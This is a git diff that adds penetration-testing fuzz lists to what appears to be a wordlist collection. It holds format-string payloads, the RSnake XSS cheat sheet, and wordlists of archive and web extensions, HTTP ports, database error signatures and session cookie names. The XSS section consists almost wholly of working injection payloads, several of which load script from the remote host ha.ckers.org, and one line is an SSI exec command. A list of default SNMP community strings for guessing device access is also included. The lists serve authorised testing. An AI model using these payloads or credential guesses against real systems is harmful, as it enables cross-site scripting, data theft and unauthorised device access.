+XXXXX`perl -e 'print ".%p" x 80'`
+`perl -e 'print ".%p" x 80'`%n

Fuzzing/RSNAKE_XSS.txt

@@ -0,0 +1,74 @@
+# credit to rsnake
+<SCRIPT>alert('XSS');</SCRIPT>
+'';!--"<XSS>=&{()}
+<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
+<IMG SRC="javascript:alert('XSS');">
+<IMG SRC=javascript:alert('XSS')>
+<IMG SRC=JaVaScRiPt:alert('XSS')>
+<IMG SRC=javascript:alert(&quot;XSS&quot;)>
+<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
+<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
+SRC=&#10<IMG 6;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
+<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
+<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
+<IMG SRC="jav	ascript:alert('XSS');">
+<IMG SRC="jav&#x09;ascript:alert('XSS');">
+<IMG SRC="jav&#x0A;ascript:alert('XSS');">
+<IMG SRC="jav&#x0D;ascript:alert('XSS');">
+<IMG SRC=" &#14;  javascript:alert('XSS');">
+<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
+<IMG SRC="javascript:alert('XSS')"
+<SCRIPT>a=/XSS/
+\";alert('XSS');//
+<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
+<BODY BACKGROUND="javascript:alert('XSS')">
+<BODY ONLOAD=alert('XSS')>
+<IMG DYNSRC="javascript:alert('XSS')">
+<IMG LOWSRC="javascript:alert('XSS')">
+<BGSOUND SRC="javascript:alert('XSS');">
+<BR SIZE="&{alert('XSS')}">
+<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
+<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
+<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
+<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
+<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
+<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
+<IMG SRC='vbscript:msgbox("XSS")'>
+<IMG SRC="mocha:[code]">
+<IMG SRC="livescript:[code]">
+<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
+<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
+<META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet">
+<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
+<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
+<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
+<TABLE BACKGROUND="javascript:alert('XSS')">
+<DIV STYLE="background-image: url(javascript:alert('XSS'))">
+<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
+<DIV STYLE="width: expression(alert('XSS'));">
+<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
+<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
+<XSS STYLE="xss:expression(alert('XSS'))">
+exp/*<XSS STYLE='no\xss:noxss("*//*");
+<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
+<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
+<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
+<BASE HREF="javascript:alert('XSS');//">
+<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
+<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
+getURL("javascript:alert('XSS')")
+a="get";
+<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert('XSS');">
+<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
+<HTML><BODY>
+<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
+<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
+<? echo('<SCR)';
+<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;">
+<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
+<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>

GrepStrings/thickclient_basic_.txt

@@ -3,4 +3,11 @@ select
 username
 social
 ssn
-
+dob
+DOB
+Password
+security
+protected
+SSN
+update
+delete

Misc/Extensions.Compressed.fuzz.txt

@@ -0,0 +1,186 @@
+0
+000
+7z
+a00
+a01
+a02
+ace
+ain
+alz
+apz
+ar
+arc
+arh
+ari
+arj
+ark
+axx
+b64
+ba
+bh
+boo
+bz
+bz2
+bzip
+bzip2
+c00
+c01
+c02
+car
+cb7
+cbr
+cbt
+cbz
+cp9
+cpgz
+cpt
+dar
+dd
+deb
+dgc
+dist
+ecs
+efw
+epi
+f
+fdp
+gca
+gz
+gzi
+gzip
+ha
+hbc
+hbc2
+hbe
+hki
+hki1
+hki2
+hki3
+hpk
+hyp
+ice
+ipg
+ipk
+ish
+j
+jar.pack
+jgz
+jic
+kgb
+lbr
+lemon
+lha
+lnx
+lqr
+lz
+lzh
+lzm
+lzma
+lzo
+lzx
+md
+mint
+mou
+mpkg
+mzp
+oar
+p7m
+packgz
+package
+pae
+pak
+paq6
+paq7
+paq8
+par
+par2
+pbi
+pcv
+pea
+pet
+pf
+pim
+pit
+piz
+pkg
+pup
+puz
+pwa
+qda
+r0
+r00
+r01
+r02
+r03
+r1
+r2
+r30
+rar
+rev
+rk
+rnc
+rp9
+rpm
+rte
+rz
+rzs
+s00
+s01
+s02
+s7z
+sar
+sdc
+sdn
+sea
+sen
+sfs
+sfx
+sh
+shar
+shk
+shr
+sit
+sitx
+spt
+sqx
+sqz
+tar
+targz
+tarxz
+taz
+tbz
+tbz2
+tg
+tgz
+tlz
+tlzma
+txz
+tz
+uc2
+uha
+vem
+vsi
+wad
+war
+wot
+xef
+xez
+xmcdz
+xpi
+xx
+xz
+y
+yz
+z
+z01
+z02
+z03
+z04
+zap
+zfsendtotarget
+zip
+zipx
+zix
+zoo
+zpi
+zz

Misc/Extensions.Mostcommon.fuzz.txt

@@ -0,0 +1,30 @@
+asp
+aspx
+php
+php3
+php4
+php5
+txt
+shtm
+shtml
+phtm
+phtml
+jhtml
+pl
+jsp
+cfm
+cfml
+py
+rb
+cfg
+zip
+pdf
+gz
+tar
+tar.gz
+tgz
+doc
+docx
+xls
+xlsx
+conf

Misc/Extensions.Skipfish.fuzz.txt

@@ -0,0 +1,93 @@
+7z
+asmx
+asp
+aspx
+bak
+bat
+bin
+bz2
+c
+cc
+cfg
+cfm
+cgi
+class
+cnf
+conf
+config
+cpp
+cs
+csv
+dat
+db
+dll
+do
+doc
+dump
+ep
+err
+error
+exe
+gif
+gz
+htm
+html
+inc
+ini
+java
+jhtml
+jpg
+js
+jsf
+jsp
+key
+lib
+log
+lst
+manifest
+mdb
+meta
+msg
+nsf
+o
+old
+ora
+orig
+out
+part
+pdf
+php
+php3
+phtml
+pl
+pm
+png
+ppt
+properties
+py
+rar
+rss
+rtf
+save
+sh
+shtml
+so
+sql
+stackdump
+swf
+tar
+tar.bz2
+tar.gz
+temp
+test
+tgz
+tmp
+trace
+txt
+vb
+vbs
+ws
+xls
+xml
+xsl
+zip

Misc/common-http-ports.txt

@@ -0,0 +1,33 @@
+66
+80
+81
+443
+445
+457
+1080
+1100
+1241
+1352
+1433
+1434
+1521
+1944
+2301
+3128
+3306
+4000
+4001
+4002
+4100
+5000
+5432
+5800
+5801
+5802
+6346
+6347
+7001
+7002
+8080
+8888
+30821

Misc/errors.txt

@@ -0,0 +1,90 @@
+</font><font face="Arial" size=2>
+A syntax error has occurred
+ADODB.Field error
+ASP.NET is configured to show verbose error messages
+ASP.NET_SessionId
+Active Server Pages error
+An illegal character has been found in the statement
+An unexpected token "END-OF-STATEMENT" was found
+CLI Driver
+Can't connect to local
+Custom Error Message
+DB2 Driver
+DB2 Error
+DB2 ODBC
+Died at
+Disallowed Parent Path
+Error Diagnostic Information
+Error Message : Error loading required libraries.
+Error Report
+Error converting data type varchar to numeric
+Fatal error
+Incorrect syntax near
+Index of
+Internal Server Error
+Invalid Path Character
+Invalid procedure call or argument
+Invision Power Board Database Error
+JDBC Driver
+JDBC Error
+JDBC MySQL
+JDBC Oracle
+JDBC SQL
+Microsoft OLE DB Provider for ODBC Drivers
+Microsoft VBScript compilation error
+Microsoft VBScript error
+MySQL Driver
+MySQL Error
+MySQL ODBC
+ODBC DB2
+ODBC Driver
+ODBC Error
+ODBC Microsoft Access
+ODBC Oracle
+ODBC SQL
+ODBC SQL Server
+OLE/DB provider returned message
+ORA-0
+ORA-1
+Oracle DB2
+Oracle Driver
+Oracle Error
+Oracle ODBC
+PHP Error
+PHP Parse error
+PHP Warning
+Parent Directory
+Permission denied: 'GetObject'
+PostgreSQL query failed: ERROR: parser: parse error
+SQL Server Driver][SQL Server
+SQL command not properly ended
+SQLException
+Supplied argument is not a valid PostgreSQL result
+Syntax error in query expression
+The error occurred in
+The script whose uid is
+Type mismatch
+Unable to jump to row
+Unclosed quotation mark before the character string
+Unterminated string constant
+Warning: Cannot modify header information - headers already sent
+Warning: Supplied argument is not a valid File-Handle resource in
+Warning: mysql_query()
+Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL
+You have an error in your SQL syntax near
+data source=
+detected an internal error [IBM][CLI Driver][DB2/6000]
+error
+include_path
+invalid query
+is not allowed to access
+line
+missing expression
+mySQL error with query
+mysql error
+on MySQL result index
+on line
+server at
+server object error
+supplied argument is not a valid MySQL result resource
+unexpected end of SQL command

Misc/sessionid.txt

@@ -0,0 +1,10 @@
+ASP.NET_SessionId
+ASPSESSIONID
+SITESERVER
+cfid
+cftoken
+jsessionid
+sessid
+sid
+viewstate
+zenid

Misc/wordlist-alphanumeric-case.txt

@@ -0,0 +1,62 @@
+0
+1
+2
+3
+4
+5
+6
+7
+8
+9
+a
+b
+c
+d
+e
+f
+g
+h
+i
+j
+k
+l
+m
+n
+o
+p
+q
+r
+s
+t
+u
+v
+w
+x
+y
+z
+A
+B
+C
+D
+E
+F
+G
+H
+I
+J
+K
+L
+M
+N
+O
+P
+Q
+R
+S
+T
+U
+V
+W
+X
+Y
+Z

Misc/wordlist-common-snmp-community-strings.txt

@@ -0,0 +1,119 @@
+public
+private
+0
+0392a0
+1234
+2read
+4changes
+ANYCOM
+Admin
+C0de
+CISCO
+CR52401
+IBM
+ILMI
+Intermec
+NoGaH$@!
+OrigEquipMfr
+PRIVATE
+PUBLIC
+Private
+Public
+SECRET
+SECURITY
+SNMP
+SNMP_trap
+SUN
+SWITCH
+SYSTEM
+Secret
+Security
+Switch
+System
+TENmanUFactOryPOWER
+TEST
+access
+adm
+admin
+agent
+agent_steal
+all
+all private
+all public
+apc
+bintec
+blue
+c
+cable-d
+canon_admin
+cc
+cisco
+community
+core
+debug
+default
+dilbert
+enable
+field
+field-service
+freekevin
+fubar
+guest
+hello
+hp_admin
+ibm
+ilmi
+intermec
+internal
+l2
+l3
+manager
+mngt
+monitor
+netman
+network
+none
+openview
+pass
+password
+pr1v4t3
+proxy
+publ1c
+read
+read-only
+read-write
+readwrite
+red
+regional
+rmon
+rmon_admin
+ro
+root
+router
+rw
+rwa
+san-fran
+sanfran
+scotty
+secret
+security
+seri
+snmp
+snmpd
+snmptrap
+solaris
+sun
+superuser
+switch
+system
+tech
+test
+test2
+tiv0li
+tivoli
+trap
+world
+write
+xyzzy
+yellow
+